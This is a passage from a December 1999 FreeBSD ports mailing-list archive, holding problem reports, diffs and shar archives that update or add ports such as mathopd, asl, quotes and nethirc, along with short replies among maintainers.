found, no access) ] >> Couldn't fetch it - please try to retrieve this ] >> port manually into /usr/ports/distfiles/ and try again. ] *** Error code 1 ] ] Stop. ] *** Error code 1 ] ] Stop. ] *** Error code 1 ] ] Stop. ] *** Error code 1 ] ] Stop. ] *** Error code 1 ] ] Stop. ] *** Error code 1 ] ] Stop. ] *** Error code 1 ] ] Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 19:30:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 96256156C1 for ; Thu, 16 Dec 1999 19:30:42 -0800 (PST) (envelope-from cdf.lists@fxp.org) Received: by pawn.primelocation.net (Postfix, from userid 1016) id AA8519B4D; Thu, 16 Dec 1999 22:30:38 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by pawn.primelocation.net (Postfix) with ESMTP id A0103BA0C; Thu, 16 Dec 1999 22:30:38 -0500 (EST) Date: Thu, 16 Dec 1999 22:30:38 -0500 (EST) From: "Chris D. Faulhaber" X-Sender: cdf.lists@pawn.primelocation.net To: Charlie Root Cc: ports@freebsd.org Subject: Re: SSH still broken? In-Reply-To: <199903300345.TAA08656@station26.transbay.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 29 Mar 1999, Charlie Root wrote: > ] >> patch-ssh-1.2.27-bsd.tty.chown doesn't seem to exist on this system. > ] >> Attempting to fetch from http://www.ssh.fi/sshprotocols2/patches/. > ] fetch: patch-ssh-1.2.27-bsd.tty.chown: www.ssh.fi: HTTP server returned error code 302 This was fixed Nov 18th and updated again Nov 25 to retrieve the patch from http://www.ssh.org/patches/ Please update your ports and try again. ----- Chris D. Faulhaber - jedgar@fxp.org - jedgar@freebsd.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 2:30: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A5A7F156D8 for ; Fri, 17 Dec 1999 02:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA20838; Fri, 17 Dec 1999 02:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from plab.ku.dk (plab.ku.dk [130.225.105.65]) by hub.freebsd.org (Postfix) with ESMTP id 1632215023 for ; Fri, 17 Dec 1999 02:25:27 -0800 (PST) (envelope-from tobez@plab.ku.dk) Received: from lion.plab.ku.dk (lion.plab.ku.dk [130.225.105.49]) by plab.ku.dk (8.9.3/8.9.3) with ESMTP id LAA03744 for ; Fri, 17 Dec 1999 11:26:48 +0100 (CET) (envelope-from tobez@plab.ku.dk) Received: (from tobez@localhost) by lion.plab.ku.dk (8.9.3/8.9.3) id LAA31298; Fri, 17 Dec 1999 11:25:32 +0100 (CET) (envelope-from tobez) Message-Id: <199912171025.LAA31298@lion.plab.ku.dk> Date: Fri, 17 Dec 1999 11:25:32 +0100 (CET) From: tobez@plab.ku.dk Reply-To: tobez@plab.ku.dk To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15527: www/mathopd upgrade: 1.3 => 1.3pl2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15527 >Category: ports >Synopsis: www/mathopd upgrade: 1.3 => 1.3pl2 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 02:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Anton Berezin >Release: FreeBSD 4.0-CURRENT i386 >Organization: The Protein Laboratory, University of Copenhagen >Environment: N/A >Description: Newer version of the port is available. >How-To-Repeat: N/A >Fix: No new files, no deleted files. Here's the diffs: diff -ruN mathopd13/Makefile mathopd/Makefile --- mathopd13/Makefile Fri Dec 17 11:05:49 1999 +++ mathopd/Makefile Fri Dec 17 11:13:43 1999 @@ -6,7 +6,7 @@ # $FreeBSD: ports/www/mathopd/Makefile,v 1.1.1.1 1999/11/26 19:38:30 steve Exp $ # -DISTNAME= mathopd-1.3 +DISTNAME= mathopd-1.3pl2 CATEGORIES= www MASTER_SITES= http://mathop.diva.nl/dist/ \ ftp://ftp.prima.eu.org/pub/mirrored_files/mathop.diva.nl/ diff -ruN mathopd13/files/md5 mathopd/files/md5 --- mathopd13/files/md5 Fri Dec 17 11:05:49 1999 +++ mathopd/files/md5 Fri Dec 17 11:15:43 1999 @@ -1 +1 @@ -MD5 (mathopd-1.3.tar.gz) = 718b318fc0c3737c99753aed8327aa31 +MD5 (mathopd-1.3pl2.tar.gz) = 9bd5eda6011f3ba8f6fb43a94e21e61b diff -ruN mathopd13/patches/patch-aa mathopd/patches/patch-aa --- mathopd13/patches/patch-aa Fri Dec 17 11:05:49 1999 +++ mathopd/patches/patch-aa Fri Dec 17 11:11:06 1999 @@ -1,5 +1,5 @@ ---- Makefile.orig Sun Oct 31 18:25:08 1999 -+++ Makefile Sun Oct 31 19:03:04 1999 +--- Makefile.orig Fri Dec 17 11:09:22 1999 ++++ Makefile Fri Dec 17 11:09:08 1999 @@ -1,23 +1,7 @@ -BIN=mathopd -CC=gcc @@ -21,7 +21,7 @@ - -all: $(BIN) -install: $(BIN) -- install $(BIN) $(SBINDIR) +- install -c $(BIN) $(SBINDIR) -$(BIN): $(OBJS) - $(CC) $(LDFLAGS) -o $(BIN) $(OBJS) $(LDLIBS) -$(OBJS): $(DEPENDS) Cheers, Anton. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 9:25:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: from wall.polstra.com (rtrwan160.accessone.com [206.213.115.74]) by hub.freebsd.org (Postfix) with ESMTP id E231E15795 for ; Fri, 17 Dec 1999 09:25:31 -0800 (PST) (envelope-from jdp@polstra.com) Received: from vashon.polstra.com (vashon.polstra.com [206.213.73.13]) by wall.polstra.com (8.9.3/8.9.3) with ESMTP id JAA20096; Fri, 17 Dec 1999 09:24:43 -0800 (PST) (envelope-from jdp@polstra.com) From: John Polstra Received: (from jdp@localhost) by vashon.polstra.com (8.9.3/8.9.1) id JAA22306; Fri, 17 Dec 1999 09:24:42 -0800 (PST) (envelope-from jdp@polstra.com) Date: Fri, 17 Dec 1999 09:24:42 -0800 (PST) Message-Id: <199912171724.JAA22306@vashon.polstra.com> To: naddy@unix-ag.uni-kl.de Subject: Re: ports/15495: Add "addsum" target to bsd.port.mk In-Reply-To: <199912151530.QAA44121@fettuccini.unix-ag.uni-kl.de> References: <199912151530.QAA44121@fettuccini.unix-ag.uni-kl.de> Organization: Polstra & Co., Seattle, WA Cc: ports@freebsd.org Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article <199912151530.QAA44121@fettuccini.unix-ag.uni-kl.de>, Christian Weisgerber wrote: > > >Number: 15495 > >Category: ports > >Synopsis: Add "addsum" target to bsd.port.mk ... > The appended patch adds an "addsum" target to bsd.port.mk. As the > name implies, "addsum" puts additional checksums into files/md5 > rather than overwriting it completely as "makesum" does. This is > very handy in the (admittedly rather rare) case where your > DISTFILES/PATCHFILES change depending on options such as NO_X11. That would be a very nice feature to have! John -- John Polstra jdp@polstra.com John D. Polstra & Co., Inc. Seattle, Washington USA "No matter how cynical I get, I just can't keep up." -- Nora Ephron To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 9:41:45 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A84921574E for ; Fri, 17 Dec 1999 09:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA68251; Fri, 17 Dec 1999 09:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from blackdawn.com (deepspace9.dcds.edu [207.231.151.2]) by hub.freebsd.org (Postfix) with ESMTP id 70D1414F0A for ; Fri, 17 Dec 1999 09:32:38 -0800 (PST) (envelope-from will@blackdawn.com) Received: (from root@localhost) by blackdawn.com (8.9.3/8.9.3) id MAA00821; Fri, 17 Dec 1999 12:32:32 -0500 (EST) (envelope-from will) Message-Id: <199912171732.MAA00821@blackdawn.com> Date: Fri, 17 Dec 1999 12:32:32 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15529: new port: misc/quotes Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15529 >Category: ports >Synopsis: new port: misc/quotes >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 09:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Tue Nov 30 10:14:31 EST 1999 root@argon.blackdawn.com:/usr/src/sys/compile/ARGON i386 >Description: This is a set of Perl scripts that can be used to fetch quotes on stocks + Slashdot headlines, etc. See pkg/DESCR. Since it is based on Perl 5.001 or later, there should be no problems with -STABLE. >How-To-Repeat: Use the shar below to add the port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # quotes # quotes/files # quotes/files/md5 # quotes/pkg # quotes/pkg/COMMENT # quotes/pkg/DESCR # quotes/pkg/PLIST # quotes/patches # quotes/Makefile # echo c - quotes mkdir -p quotes > /dev/null 2>&1 echo c - quotes/files mkdir -p quotes/files > /dev/null 2>&1 echo x - quotes/files/md5 sed 's/^X//' >quotes/files/md5 << 'END-of-quotes/files/md5' XMD5 (quotes-1.5-1.tar.gz) = 3ab116c4c3181702ada4104e158f2c9d END-of-quotes/files/md5 echo c - quotes/pkg mkdir -p quotes/pkg > /dev/null 2>&1 echo x - quotes/pkg/COMMENT sed 's/^X//' >quotes/pkg/COMMENT << 'END-of-quotes/pkg/COMMENT' XQuote, currency, and Slashdot headline fetcher based on Perl. END-of-quotes/pkg/COMMENT echo x - quotes/pkg/DESCR sed 's/^X//' >quotes/pkg/DESCR << 'END-of-quotes/pkg/DESCR' XThis is a stock quote / currency status / Slashdot headline Xfetcher. It was designed to save bandwidth, which is particularly Xexpensive in Europe. It has the capability of emailing these Xto you at so and so time designated by a crontab entry for its Xautomailing program. This entire package is based on Perl. X XWWW: http://www.iae.nl/users/grimaldo/OpenSoft/quotes.shtml XAuthor: D. Emilio Grimaldo Tunon X X--Will END-of-quotes/pkg/DESCR echo x - quotes/pkg/PLIST sed 's/^X//' >quotes/pkg/PLIST << 'END-of-quotes/pkg/PLIST' Xbin/quotes Xbin/quotesmailer Xlib/perl5/site_perl/%%PERL_VER%%/Net/QuExample.pm Xshare/quotes/sample.quotesrc Xshare/quotes/quotes.txt Xshare/quotes/ChangeLog Xshare/quotes/quotes.spec Xshare/quotes/quotesrc X@dirrm share/quotes END-of-quotes/pkg/PLIST echo c - quotes/patches mkdir -p quotes/patches > /dev/null 2>&1 echo x - quotes/Makefile sed 's/^X//' >quotes/Makefile << 'END-of-quotes/Makefile' X# New ports collection makefile for: quotes X# Version required: 1.5-1 X# Date created: 19 Nov 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= quotes-1.5-1 XPKGNAME= quotes-1.5.1 XCATEGORIES= misc perl5 XMASTER_SITES= ftp://ftp.iae.nl/pub/users/grimaldo/ \ X ftp://coralys.com/pub/free/ X XMAINTAINER= andrews@technologist.com X XUSE_PERL= yes XNO_BUILD= yes X Xpre-install: X @${PERL} -pi -e "s:/usr/local/lib/Quotes:${PREFIX}/share/quotes:g" ${WRKSRC}/* X @${PERL} -pi -e "s:/usr/bin/netscape:${LOCALBASE}/bin/netscape:g" ${WRKSRC}/sample.quotesrc X @${PERL} -pi -e \ X "s:/home/grimaldo/PerlLibs:${PREFIX}/lib/perl5/site_perl/${PERL_VER}/Net/:g" ${WRKSRC}/sample.quotesrc X Xdo-install: X @${INSTALL_SCRIPT} ${WRKSRC}/quotes ${PREFIX}/bin X @${INSTALL_SCRIPT} ${WRKSRC}/quotesmailer ${PREFIX}/bin X @${INSTALL_DATA} ${WRKSRC}/QuExample.pm ${PREFIX}/lib/perl5/site_perl/${PERL_VER}/Net/QuExample.pm X @${MKDIR} ${PREFIX}/share/quotes X @${INSTALL_DATA} ${WRKSRC}/quotes.txt ${PREFIX}/share/quotes X @${INSTALL_DATA} ${WRKSRC}/ChangeLog ${PREFIX}/share/quotes X @${INSTALL_DATA} ${WRKSRC}/quotes.spec ${PREFIX}/share/quotes X @${INSTALL_DATA} ${WRKSRC}/sample.quotesrc ${PREFIX}/share/quotes X @${INSTALL_DATA} ${WRKSRC}/sample.quotesrc ${PREFIX}/share/quotes/quotesrc X X.include END-of-quotes/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 9:46:54 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5D52C14F0A; Fri, 17 Dec 1999 09:46:53 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA68653; Fri, 17 Dec 1999 09:46:53 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Fri, 17 Dec 1999 09:46:53 -0800 (PST) From: Message-Id: <199912171746.JAA68653@freefall.freebsd.org> To: andrews@technologist.com, billf@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15529: new port: misc/quotes Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: new port: misc/quotes State-Changed-From-To: open->closed State-Changed-By: billf State-Changed-When: Fri Dec 17 09:45:40 PST 1999 State-Changed-Why: The port already exists, please submit a 'diff -ruN' instead. I know it exists, because I imported it. :> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 9:50:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7D80C14EF0 for ; Fri, 17 Dec 1999 09:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA68904; Fri, 17 Dec 1999 09:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from blackdawn.com (deepspace9.dcds.edu [207.231.151.2]) by hub.freebsd.org (Postfix) with ESMTP id DDF9C14A1A for ; Fri, 17 Dec 1999 09:42:02 -0800 (PST) (envelope-from will@blackdawn.com) Received: (from root@localhost) by blackdawn.com (8.9.3/8.9.3) id MAA01131; Fri, 17 Dec 1999 12:41:57 -0500 (EST) (envelope-from will) Message-Id: <199912171741.MAA01131@blackdawn.com> Date: Fri, 17 Dec 1999 12:41:57 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15530: new port: irc/nethirc Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15530 >Category: ports >Synopsis: new port: irc/nethirc >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 09:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Tue Nov 30 10:14:31 EST 1999 root@argon.blackdawn.com:/usr/src/sys/compile/ARGON i386 >Description: This is (another) perl-based IRC client. See pkg/DESCR for an interesting description. I would like to request the review by jedgar@FreeBSD.org, since it is based on his p5-IRC port. :-) >How-To-Repeat: Use the shar below to add the port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # nethirc # nethirc/files # nethirc/files/md5 # nethirc/pkg # nethirc/pkg/COMMENT # nethirc/pkg/DESCR # nethirc/pkg/PLIST # nethirc/patches # nethirc/Makefile # echo c - nethirc mkdir -p nethirc > /dev/null 2>&1 echo c - nethirc/files mkdir -p nethirc/files > /dev/null 2>&1 echo x - nethirc/files/md5 sed 's/^X//' >nethirc/files/md5 << 'END-of-nethirc/files/md5' XMD5 (nethirc-0.04.tar.Z) = 725fcc1a2c0cc59d28f7019b96937d49 END-of-nethirc/files/md5 echo c - nethirc/pkg mkdir -p nethirc/pkg > /dev/null 2>&1 echo x - nethirc/pkg/COMMENT sed 's/^X//' >nethirc/pkg/COMMENT << 'END-of-nethirc/pkg/COMMENT' XPerl-based irc client that uses Net::IRC. END-of-nethirc/pkg/COMMENT echo x - nethirc/pkg/DESCR sed 's/^X//' >nethirc/pkg/DESCR << 'END-of-nethirc/pkg/DESCR' XInteresting Perl-based IRC client with some XNetHack flavor that spices up the interface. X XWWW: http://www.nog.net/~tony/ XAuthor: Tony Monroe X X--Will END-of-nethirc/pkg/DESCR echo x - nethirc/pkg/PLIST sed 's/^X//' >nethirc/pkg/PLIST << 'END-of-nethirc/pkg/PLIST' Xbin/nethirc Xbin/nhirc Xshare/nethirc/HACKING Xshare/nethirc/INSTALL Xshare/nethirc/LICENSE Xshare/nethirc/README Xshare/nethirc/TODO Xshare/nethirc/channel_mode Xshare/nethirc/classes Xshare/nethirc/commands Xshare/nethirc/commands.pl Xshare/nethirc/complaints Xshare/nethirc/ctcp Xshare/nethirc/deities Xshare/nethirc/disasters Xshare/nethirc/formats Xshare/nethirc/handlers Xshare/nethirc/handlers.pl Xshare/nethirc/helpers.pl Xshare/nethirc/monsters Xshare/nethirc/nhircrc Xshare/nethirc/scrolls Xshare/nethirc/self_mode X@dirrm share/nethirc END-of-nethirc/pkg/PLIST echo c - nethirc/patches mkdir -p nethirc/patches > /dev/null 2>&1 echo x - nethirc/Makefile sed 's/^X//' >nethirc/Makefile << 'END-of-nethirc/Makefile' X# New ports collection makefile for: nethirc X# Version required: 0.04 X# Date created: 15 Dec 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= nethirc-0.04 XCATEGORIES= irc XMASTER_SITES= ftp://ftp.nog.net/pub/tony/nethirc/ XEXTRACT_SUFX= .tar.Z X XMAINTAINER= andrews@technologist.com X XRUN_DEPENDS= ${LOCALBASE}/lib/perl5/site_perl/5.005/Net/IRC.pm:${PORTSDIR}/irc/p5-IRC X XNO_BUILD= yes XUSE_PERL5= yes XMAN1= nethirc.1 X Xdo-install: X (cd ${WRKSRC} && ${SH} install.sh ${PREFIX}) X X.include END-of-nethirc/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 9:50:33 1999 Delivered-To: freebsd-ports@freebsd.org Received: from blackdawn.com (deepspace9.dcds.edu [207.231.151.2]) by hub.freebsd.org (Postfix) with ESMTP id 4BA4F14FD1; Fri, 17 Dec 1999 09:50:21 -0800 (PST) (envelope-from will@blackdawn.com) Received: (from will@localhost) by blackdawn.com (8.9.3/8.9.3) id MAA01149; Fri, 17 Dec 1999 12:50:16 -0500 (EST) (envelope-from will) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <199912171746.JAA68653@freefall.freebsd.org> Date: Fri, 17 Dec 1999 12:50:16 -0500 (EST) From: will andrews To: billf@FreeBSD.ORG Subject: Re: ports/15529: new port: misc/quotes Cc: freebsd-ports@FreeBSD.ORG Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 17-Dec-99 billf@FreeBSD.ORG wrote: > Synopsis: new port: misc/quotes > > State-Changed-From-To: open->closed > State-Changed-By: billf > State-Changed-When: Fri Dec 17 09:45:40 PST 1999 > State-Changed-Why: > The port already exists, please submit a 'diff -ruN' instead. > > I know it exists, because I imported it. :> #@!$&%! Commit irc/nethirc and I will give you diff -urN. ;-) -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 9:53:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id D8F4D1579D; Fri, 17 Dec 1999 09:53:21 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id E6DE41C2B; Fri, 17 Dec 1999 12:52:59 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id E361D381B; Fri, 17 Dec 1999 12:52:59 -0500 (EST) Date: Fri, 17 Dec 1999 12:52:59 -0500 (EST) From: Bill Fumerola To: will andrews Cc: billf@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG Subject: Re: ports/15529: new port: misc/quotes In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 17 Dec 1999, will andrews wrote: > #@!$&%! Commit irc/nethirc and I will give you diff -urN. ;-) Satoshi would kill me if I did that. :-) -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 11:50:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7D6F315798 for ; Fri, 17 Dec 1999 11:50:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA80013; Fri, 17 Dec 1999 11:50:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 76F9814FC4; Fri, 17 Dec 1999 11:49:36 -0800 (PST) Message-Id: <19991217194936.76F9814FC4@hub.freebsd.org> Date: Fri, 17 Dec 1999 11:49:36 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15533: Update port: devel/asl to 1.41r8 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15533 >Category: ports >Synopsis: Update port: devel/asl to 1.41r8 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 11:50:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Updated version 1.41r7 to 1.41r8 Remove file: patches/patch-aa >How-To-Repeat: >Fix: diff -urN /usr/ports/devel/asl/Makefile devel/asl/Makefile --- /usr/ports/devel/asl/Makefile Wed Aug 25 19:13:47 1999 +++ devel/asl/Makefile Fri Dec 17 05:01:39 1999 @@ -1,12 +1,12 @@ -# New ports collection makefile for: asl -# Version required: 1.41r7 -# Date created: 18 June 1997 -# Whom: Thomas Gellekum +# New ports collection makefile for: asl +# Version required: 1.41r8 +# Date created: 18 June 1997 +# Whom: Thomas Gellekum # # $FreeBSD: ports/devel/asl/Makefile,v 1.7 1999/08/25 05:47:21 obrien Exp $ # -DISTNAME= asl-1.41r7 +DISTNAME= asl-1.41r8 CATEGORIES= devel MASTER_SITES= ${MASTER_SITE_SUNSITE} \ ftp://john.ccac.rwth-aachen.de/pub/as/source/c_version/ @@ -22,7 +22,7 @@ ${CP} ${FILESDIR}/Makefile.def ${WRKSRC} post-install: - ${MKDIR} ${PREFIX}/share/doc/asl + @${MKDIR} ${PREFIX}/share/doc/asl ${INSTALL_DATA} ${WRKSRC}/doc_EN/* ${PREFIX}/share/doc/asl .include diff -urN /usr/ports/devel/asl/files/Makefile.def devel/asl/files/Makefile.def --- /usr/ports/devel/asl/files/Makefile.def Sat Jun 27 07:14:12 1998 +++ devel/asl/files/Makefile.def Fri Dec 17 05:04:53 1999 @@ -2,7 +2,7 @@ # choose your compiler (must be ANSI-compliant!) and linker command, plus # any additionally needed flags -LD = cc +LD = ${CC} LDFLAGS = -s # ------------------------------------------------------------------------- diff -urN /usr/ports/devel/asl/files/md5 devel/asl/files/md5 --- /usr/ports/devel/asl/files/md5 Fri Jun 26 07:37:33 1998 +++ devel/asl/files/md5 Fri Dec 17 05:03:44 1999 @@ -1 +1 @@ -MD5 (asl-1.41r7.tar.gz) = d2741dbc539905e05255bb9926c3948b +MD5 (asl-1.41r8.tar.gz) = f8b34f1acb48663243402b43f6070fd3 diff -urN /usr/ports/devel/asl/patches/patch-aa devel/asl/patches/patch-aa --- /usr/ports/devel/asl/patches/patch-aa Thu Jun 25 23:06:56 1998 +++ devel/asl/patches/patch-aa Thu Jan 1 09:00:00 1970 @@ -1,52 +0,0 @@ ---- makedefs.str.orig Wed Feb 18 10:31:49 1998 -+++ makedefs.str Thu Jun 25 15:30:48 1998 -@@ -1,41 +1,41 @@ - ioerrs.$(OBJEXTENSION): ioerrs.rsc - - ioerrs.msg ioerrs.rsc: ioerrs.res header.res $(RESCOMPTARGET) -- $(RESCOMPTARGET) ioerrs.res ioerrs.msg ioerrs.rsc -+ ./$(RESCOMPTARGET) ioerrs.res ioerrs.msg ioerrs.rsc - - cmdarg.$(OBJEXTENSION): cmdarg.rsc - - cmdarg.msg cmdarg.rsc: cmdarg.res header.res $(RESCOMPTARGET) -- $(RESCOMPTARGET) cmdarg.res cmdarg.msg cmdarg.rsc -+ ./$(RESCOMPTARGET) cmdarg.res cmdarg.msg cmdarg.rsc - - toolutils.$(OBJEXTENSION): tools.rsc - - tools.msg tools.rsc: tools.res header.res $(RESCOMPTARGET) -- $(RESCOMPTARGET) tools.res tools.msg tools.rsc -+ ./$(RESCOMPTARGET) tools.res tools.msg tools.rsc - - as.$(OBJEXTENSION) asminclist.$(OBJEXTENSION) asmmac.$(OBJEXTENSION) asmpars.$(OBJEXTENSION) asmsub.$(OBJEXTENSION): as.rsc - - as.msg as.rsc: as.res header.res $(RESCOMPTARGET) -- $(RESCOMPTARGET) as.res as.msg as.rsc -+ ./$(RESCOMPTARGET) as.res as.msg as.rsc - - plist.$(OBJEXTENSION): plist.rsc - - plist.msg plist.rsc: plist.res tools2.res header.res $(RESCOMPTARGET) -- $(RESCOMPTARGET) plist.res plist.msg plist.rsc -+ ./$(RESCOMPTARGET) plist.res plist.msg plist.rsc - - pbind.$(OBJEXTENSION): pbind.rsc - - pbind.msg pbind.rsc: pbind.res tools2.res header.res $(RESCOMPTARGET) -- $(RESCOMPTARGET) pbind.res pbind.msg pbind.rsc -+ ./$(RESCOMPTARGET) pbind.res pbind.msg pbind.rsc - - p2hex.$(OBJEXTENSION): p2hex.rsc - - p2hex.msg p2hex.rsc: p2hex.res tools2.res header.res $(RESCOMPTARGET) -- $(RESCOMPTARGET) p2hex.res p2hex.msg p2hex.rsc -+ ./$(RESCOMPTARGET) p2hex.res p2hex.msg p2hex.rsc - - p2bin.$(OBJEXTENSION): p2bin.rsc - - p2bin.msg p2bin.rsc: p2bin.res tools2.res header.res $(RESCOMPTARGET) -- $(RESCOMPTARGET) p2bin.res p2bin.msg p2bin.rsc -+ ./$(RESCOMPTARGET) p2bin.res p2bin.msg p2bin.rsc - - tex2doc.$(OBJEXTENSION): ushyph.h grhyph.h >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 12: 0:10 1999 